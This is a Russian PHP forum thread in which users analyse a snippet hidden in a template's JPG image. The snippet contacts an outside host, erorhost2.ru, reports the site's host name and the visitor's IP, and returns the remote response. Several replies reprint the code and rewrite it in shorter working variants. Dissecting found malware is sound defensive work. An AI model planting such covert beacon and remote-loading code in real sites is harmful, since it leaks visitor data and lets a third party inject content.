Что делает этот код?

Тема в разделе "PHP", создана пользователем Jak1777, 2 ноя 2009.

Статус темы:
Закрыта.
Модераторы: latteo
  1. Jak1777

    Jak1777 Создатель

    Регистр.:
    15 июн 2007
    Сообщения:
    16
    Симпатии:
    1
    В jpg картинке сидел такой код:
    Код:
    <?php 
     $x0b = @fsockopen('erorhost2.ru', 80, $x0c, $x0d, 6); 
     if(!$x0b){
         return ''; 
    }else{
        $x0e = @file("http://erorhost2.ru/id1.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]");
        return implode('',$x0e); 
    }
    ?> 
    Что он делает? На сколько я понял что если смог подключится к хосту erorhost2.ru то возвращает нулевой результат если нет то содержимое отсюда: http://erorhost2.ru/id1.php?site=ya.ru&ip=195.15.1.2 ?
     
  2. unsiker

    unsiker

    Регистр.:
    6 июн 2008
    Сообщения:
    465
    Симпатии:
    172
    Идет какая то проверка подключения
    Код:
    $x0b = @fsockopen('erorhost2.ru', 80, $x0c, $x0d, 6); 
    
    проверяет можно ли достучатся до erorhost2.ru по 80 порту. Если соединение непрошло то возращат пустую строку. Если прошло то возращает то что выдает сккрипт id1.php на сервере erorhost2.ru.
    И еще функция implode — Объединяет элементы массива в строку
     
    Jak1777 нравится это.
  3. FL@SH

    FL@SH Читатель

    Заблокирован
    Регистр.:
    20 июл 2008
    Сообщения:
    193
    Симпатии:
    25
    Вот непонятно зачем тут implode? file только нагружает сервер, вот так было бы рациональнее
    PHP:
    <?php 
       $x0b 
    = @fsockopen('erorhost2.ru'80$x0c$x0d6); 
       if(!
    $x0b){
         return 
    ''
       }else{
         return @
    file_get_contents("http://erorhost2.ru/id1.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]");
       }
    ?>
     
  4. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217
    Рациональней с точки зрения краткости, можно было просто
    PHP:
    echo(@file_get_contents("http://erorhost2.ru/id1.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]"));
    Если с точки зрения универсальности, тогда лучше было продолжить сокеты на fsockopen (да и закрывать их тоже надо бы).
     
  5. bumer3

    bumer3

    Регистр.:
    10 янв 2008
    Сообщения:
    291
    Симпатии:
    154
    Этот код запрашивает проверяет твою лицензию у разработчика скрипта на сайте. Шлет туда ИП и адрес сайта где стоит скрипт.
     
  6. Jak1777

    Jak1777 Создатель

    Регистр.:
    15 июн 2007
    Сообщения:
    16
    Симпатии:
    1
    Зачем скрипту спрятанному в картинке шаблона неокса проверять мою лицензию? Думаю что он должен возвращать либо рекламу либо шелл(не уверен сработает ли с таким кодом). Только он еще ничего не подгружает видимо ждет пока шаблон расползется по паблику.
     
  7. dandandan

    dandandan

    Регистр.:
    7 авг 2008
    Сообщения:
    990
    Симпатии:
    266
    Возник вопрос близкий по теме. Как в jpg картинку запихивают такой код и как можно защититься от такого кода при заливке картинки на веб сервер ?
     
  8. tostrss

    tostrss

    Регистр.:
    16 окт 2007
    Сообщения:
    771
    Симпатии:
    217
    Засунули пхп код в текстовый файл, а потом переименовали.
    Контролировать надо по содержимому.
     
    dandandan нравится это.
  9. bumer3

    bumer3

    Регистр.:
    10 янв 2008
    Сообщения:
    291
    Симпатии:
    154
    Он не лицензию проверяет. А просто собирает инфу о том где его шаблон используют. Чтобы знать. Если хочеш использовать шаб лучше убери этот код.
     
  10. dandandan

    dandandan

    Регистр.:
    7 авг 2008
    Сообщения:
    990
    Симпатии:
    266
    Т.е. в нормальную картинку такое засунуть и выполнить нельзя?
     
Статус темы:
Закрыта.